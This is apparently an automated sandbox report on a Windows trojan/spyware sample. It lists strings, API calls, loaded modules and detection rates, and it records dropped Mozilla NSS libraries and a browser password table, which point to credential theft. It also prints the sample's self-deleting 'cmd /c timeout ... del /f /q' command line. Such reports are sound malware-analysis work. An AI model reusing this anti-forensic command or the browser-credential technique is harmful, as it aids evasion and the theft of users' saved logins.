Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4335A0	0_2_6C4335A0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C445440	0_2_6C445440
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4A545C	0_2_6C4A545C
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4AAC00	0_2_6C4AAC00
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C475C10	0_2_6C475C10
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C482C10	0_2_6C482C10
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4A542B	0_2_6C4A542B
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4464C0	0_2_6C4464C0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C45D4D0	0_2_6C45D4D0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C43D4E0	0_2_6C43D4E0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C476CF0	0_2_6C476CF0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C446C80	0_2_6C446C80
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4934A0	0_2_6C4934A0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C49C4A0	0_2_6C49C4A0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C44FD00	0_2_6C44FD00
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C460512	0_2_6C460512
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C45ED10	0_2_6C45ED10
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C470DD0	0_2_6C470DD0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4985F0	0_2_6C4985F0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C454640	0_2_6C454640
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C482E4E	0_2_6C482E4E
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C459E50	0_2_6C459E50
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C473E50	0_2_6C473E50
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4A6E63	0_2_6C4A6E63
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C43C670	0_2_6C43C670
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C485600	0_2_6C485600
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C477E10	0_2_6C477E10
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C499E30	0_2_6C499E30
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4A76E3	0_2_6C4A76E3
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C43BEF0	0_2_6C43BEF0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C44FEF0	0_2_6C44FEF0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C49E680	0_2_6C49E680
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C455E90	0_2_6C455E90
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C494EA0	0_2_6C494EA0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C449F00	0_2_6C449F00
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C477710	0_2_6C477710
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C43DFE0	0_2_6C43DFE0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C466FF0	0_2_6C466FF0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4877A0	0_2_6C4877A0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C458850	0_2_6C458850
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C45D850	0_2_6C45D850
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C47F070	0_2_6C47F070
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C447810	0_2_6C447810
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C47B820	0_2_6C47B820
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C484820	0_2_6C484820
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4A50C7	0_2_6C4A50C7
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C45C0E0	0_2_6C45C0E0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4758E0	0_2_6C4758E0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4660A0	0_2_6C4660A0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C45A940	0_2_6C45A940
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C44D960	0_2_6C44D960
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C48B970	0_2_6C48B970
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4AB170	0_2_6C4AB170
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C475190	0_2_6C475190
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C492990	0_2_6C492990
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C43C9A0	0_2_6C43C9A0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C46D9B0	0_2_6C46D9B0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C479A60	0_2_6C479A60
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C478AC0	0_2_6C478AC0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C451AF0	0_2_6C451AF0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C47E2F0	0_2_6C47E2F0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4ABA90	0_2_6C4ABA90
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4322A0	0_2_6C4322A0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C464AA0	0_2_6C464AA0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C44CAB0	0_2_6C44CAB0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4A2AB0	0_2_6C4A2AB0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C435340	0_2_6C435340
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C44C370	0_2_6C44C370
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C47D320	0_2_6C47D320
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4A53C8	0_2_6C4A53C8
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C43F380	0_2_6C43F380
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4EAC60	0_2_6C4EAC60
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C5A6C00	0_2_6C5A6C00
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C5BAC30	0_2_6C5BAC30
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C53ECD0	0_2_6C53ECD0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4DECC0	0_2_6C4DECC0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C5AED70	0_2_6C5AED70
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C60AD50	0_2_6C60AD50
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C668D20	0_2_6C668D20
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C66CDC0	0_2_6C66CDC0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C576D90	0_2_6C576D90
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4E4DB0	0_2_6C4E4DB0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C57EE70	0_2_6C57EE70
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C5C0E20	0_2_6C5C0E20
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4EAEC0	0_2_6C4EAEC0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C580EC0	0_2_6C580EC0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C566E90	0_2_6C566E90
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C54EF40	0_2_6C54EF40
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C5A2F70	0_2_6C5A2F70
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C620F20	0_2_6C620F20
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4E6F10	0_2_6C4E6F10
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C5BEFF0	0_2_6C5BEFF0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4E0FE0	0_2_6C4E0FE0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C628FB0	0_2_6C628FB0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C4EEFB0	0_2_6C4EEFB0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C5B4840	0_2_6C5B4840
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C530820	0_2_6C530820
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C56A820	0_2_6C56A820
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C5E68E0	0_2_6C5E68E0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C518960	0_2_6C518960
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C536900	0_2_6C536900

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: String function: 6C4794D0 appears 90 times
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: String function: 017E43D0 appears 316 times
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: String function: 6C46CBE8 appears 134 times
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: String function: 6C6609D0 appears 79 times

Source: jlO7971vUz.exe, 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs jlO7971vUz.exe
Source: jlO7971vUz.exe, 00000000.00000002.2261143124.0000000027D3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs jlO7971vUz.exe
Source: jlO7971vUz.exe, 00000000.00000002.2272122694.000000006C4C2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs jlO7971vUz.exe

Source: jlO7971vUz.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/23@0/1

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_6C497030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C497030

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_017F6550 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_017F6550

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_00B32B10 FindResourceA,LoadResource,SizeofResource,memset,memcpy,

0_2_00B32B10

Source: C:\Users\user\Desktop\jlO7971vUz.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03

Source: jlO7971vUz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\jlO7971vUz.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: jlO7971vUz.exe, 00000000.00000002.2271224969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2255571648.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: jlO7971vUz.exe, 00000000.00000002.2271224969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2255571648.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: jlO7971vUz.exe, 00000000.00000002.2271224969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2255571648.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: jlO7971vUz.exe, 00000000.00000002.2271224969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2255571648.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: jlO7971vUz.exe, jlO7971vUz.exe, 00000000.00000002.2271224969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2255571648.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: jlO7971vUz.exe, 00000000.00000002.2271224969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2255571648.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: jlO7971vUz.exe, 00000000.00000002.2271224969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2255571648.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: jlO7971vUz.exe, 00000000.00000003.2166019163.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000003.2154068733.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, JDGCGHCGHCBFHJJKKJEH.0.dr, KJJJKFIIIJJJECAAEHDB.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: jlO7971vUz.exe, 00000000.00000002.2271224969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2255571648.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: jlO7971vUz.exe, 00000000.00000002.2271224969.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2255571648.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: jlO7971vUz.exe	ReversingLabs: Detection: 50%
Source: jlO7971vUz.exe	Virustotal: Detection: 51%

Source: unknown	Process created: C:\Users\user\Desktop\jlO7971vUz.exe "C:\Users\user\Desktop\jlO7971vUz.exe"
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\jlO7971vUz.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\jlO7971vUz.exe" & del "C:\ProgramData\*.dll"" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: jlO7971vUz.exe

Static file information: File size 15461583 > 1048576

Source: jlO7971vUz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: jlO7971vUz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: jlO7971vUz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: jlO7971vUz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: jlO7971vUz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: jlO7971vUz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: jlO7971vUz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: jlO7971vUz.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: jlO7971vUz.exe, 00000000.00000002.2272007569.000000006C4AD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: jlO7971vUz.exe, 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: jlO7971vUz.exe, 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: jlO7971vUz.exe, 00000000.00000002.2272007569.000000006C4AD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: jlO7971vUz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: jlO7971vUz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: jlO7971vUz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: jlO7971vUz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: jlO7971vUz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_00B32690 LoadLibraryA,GetProcAddress,GetProcAddress,NtUnmapViewOfSection,GetProcAddress,GetCurrentProcess,NtAllocateVirtualMemory,GetCurrentProcess,

0_2_00B32690

Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B38BF6 push ecx; ret	0_2_00B38C09
